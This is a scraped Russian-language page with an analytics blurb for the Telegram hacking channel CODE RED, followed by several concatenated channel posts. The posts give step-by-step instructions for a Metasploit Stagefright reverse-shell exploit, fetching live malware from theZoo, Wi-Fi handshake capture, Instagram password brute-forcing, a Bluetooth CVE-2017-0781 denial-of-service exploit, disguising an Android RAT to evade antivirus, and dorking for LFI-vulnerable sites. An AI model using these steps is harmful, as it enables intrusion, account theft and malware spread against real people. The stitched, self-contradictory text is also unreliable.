CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
Больше📈 Аналитический обзор Telegram-канала CODE RED
Канал CODE RED (@coderedcom) языкового сегмента Русский является активным участником. Сейчас сообщество объединяет 10 355 подписчиков, занимая 9 416 место в категории Технологии и приложения и 61 181 место в регионе Россия.
📊 Показатели аудитории и динамика
С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 10 355 подписчиков.
Согласно последним данным от 03 декабря, 2024, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 0, а за последние 24 часа — 0, при этом общий охват остаётся высоким.
- Статус верификации: Не верифицирован
- Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 0%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
- Охват публикаций: В среднем каждый пост получает 0 просмотров. В течение первых суток публикация набирает 0 просмотров.
- Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 0.
📝 Описание и контентная политика
Автор описывает ресурс как площадку для выражения субъективного мнения:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
Благодаря высокой частоте обновлений (последние данные получены 04 декабря, 2024) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.
exploit/android/browser/stagefright_mp4_tx3g_64bit
Теперь нужно будет последовательно прописать необходимые параметры
SRVHOST <ip>
◽️set URIPATH /
◽️set PAYLOAD linux/armle/mettle/reverse_tcp
◽️set LHOST <ip>
◽️set VERBOSE true
Остается только запустить скрипт
-j
В окне появится ссылка, при переходе по которой откроется сессия для удаленного доступа.git clone https://github.com/ytisf/theZoo
Использование
Запускаем интерфейс командой
python theZoo.py
Далее можно выбрать из базы, к примеру, только ботнеты, прописав
search botnet
Чтобы скачать нужный мальварь вписываем
use <порядковый номер вируса в БД>
Далее просто вводим get и получаем архив с вредоносом и ключи для его расшифровки. В целях безопасности theZoo деактивирует вирусы путем шифрования.
Базу данных можно обновлять командой update-db. Более подробная справка доступна по команде help.git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
Переходим в директорию и запускаем скрипт
◽cd airgeddon/
◽sudo bash airgeddon.sh
В случае наличия на ПК всех необходимых компонентов, Airgeddon предложит выбрать сетевую карту. Обычно она начинается на wlan. Вводим её номер и жмем Enter.
Использование
После запуска откроется главное меню. Управление утилитой в принципе сводится к вводу номера команды. Соответственно для базового перехвата хендшейка сначала нужно перевести карту в режим монитора прописав 2. Далее вводим 5, перейдя в раздел работы с хендшейками.
Выбираем пункт "Explore for targets". Когда целей наберется достаточно нажимаем Ctrl-C. Далее нужно будет выбрать точку доступа только ту, у которой возле номера стоит звездочка, поскольку это означает, что к сети подключены другие пользователи.
Остается выбрать "Capture Handshake" и ввести команду 2. Откроется два окна и после перехвата хендшейка, он появится в одном из них. После нужно будет подтвердить перехват в главном окне с Airgeddon.
Далее можно перейти в главное меню и выбрать там под пунктом 6 оффлайн расшифровку хендшейка. Можно также воспользоваться онлайн ресурсами. Во всяком случае хендшейк перехвачен, без единой команды.git clone https://github.com/thelinuxchoice/instashell
Переходим в директорию и ставим права на исполняемый файл
◽cd instashell
◽chmod +x instashell.sh
Использование
Запускаем сервисы TOR командой
◽service tor start
Запускаем Instashell
◽./instashell.sh
Далее нужно ввести никнейм Instagram аккаунта и словарь паролей для перебора. Словари, в свою очередь, часто генерируются на основе собранной информации о пользователе. Как итог при нахождении подходящего пароля, скрипт остановит свою работу.git clone https://github.com/4shadoww/hakkuframework
Переходим в директорию и запускаем скрипт установки
◽cd hakkuframework/
◽./install
Использование
Запускаем фреймворк командой
◽./hakku
Чтобы получить список модулей, нужно выполнить show modules. С помощью help получаем справку по инструменту. Далее просто выбираем модуль, и также через help читаем, как им пользоваться.apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Далее обновляем pwntools
pip install --upgrade pip
pip install --upgrade pwntools
Устанавливаем библиотеки для работы с Bluetooth
apt-get install bluetooth libbluetooth-dev
pip install pybluez
Скачиваем эксплоит командой
git clone https://github.com/ojasookert/CVE-2017-0781
В скачанном python файле нужно подкорректировать количество пакетов, изменив переменную count до 30000 минимум.
Использование
Сканируем эфир командой
hcitool scan
Выбираем устройство, копируем его MAC адрес и прописываем команду
python CVE-2017-0781.py TARGET=<MAC адрес>
Как итог на атакуемое устройство начнут посылаться запросы, тем самым переполняя буфер, что приведет к ошибкам и отключению службы.git clone https://github.com/sslab-gatech/avpass
Запускаем установщик командой
./install-dep.sh
Использование
Далее нам понадобится сгенерированный билд вируса для Android. Это может быть, к примеру, RAT от AhMyth. Для базовой маскировки остается просто прописать
python gen_disguise.py -i <название файла> individual
Сгенерированный apk файл не детектится большинством антивирусов(разве что одним), а его требования к системе скрыты от пользователя при установке.
#хакингgit clone https://github.com/0x3curity/Samurai
Далее нужно будет установить Lynx командой
◽️apt install lynx
И поставить права на исполняемый файл
◽️chmod +x samurai.sh
Использование
Запускаем программу командой
◽️./samurai.sh
Перед нами появится меню, где можно будет выбрать тип поиска. Вводим соответствующую цифру, к примеру 3. Вводим название компании, и получаем список найденных корпоративных почт.
#OSINT #kaligit clone https://github.com/madRubyroid/LFIFucker.git
Далее нужно будет получить CSE-CX. Для этого нужно перейти по ссылке и добавить новую поисковую систему. В поле "Сайты, на которых выполняется поиск" нужно вписать звездочку и желаемую доменную зону, например: .ru. После сохранения, нужно перейти в Панель управления и скопировать значение из поля "Идентификатор поисковой системы".
Также нужен API-ключ для search engine. Здесь просто переходим в GCloud Console, создаем проект и включаем Custom Search API в разделе "Библиотека API". Далее переходим в "Учетные данные" и берем один из трех API ключей.
Остается только вписать эти две строчки в файл lfi.conf в корневом каталоге LFIFucker.
Использование
Для запуска сканирования по дефолтному шаблону и доркам id= и file= к примеру, нужно вписать команду
◽️./LFIFucker.sh --dork-query id=, file=
Результаты о найденных уязвимых сайтах сохранятся в директорию
tmp. Злоумышленнику останется только подобрать метод и осуществить LFI.
#хакингgit clone https://github.com/Testzero-wz/wscan.git
Переходим в папку и запускаем установщик
◽️cd wscan
◽️python3 -m pip install wscan
Использование
Стандартный фаззинг Wscan запускается в одну строчку
◽️wscan -u "http://www.example.com/" -f -m
Если вписать wscan --help и прочитать справку, можно узнать что вышепредставленная команда сканирует url по словарям, проверяет ссылки и строит карту сайта.
Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.
#хакинг #kali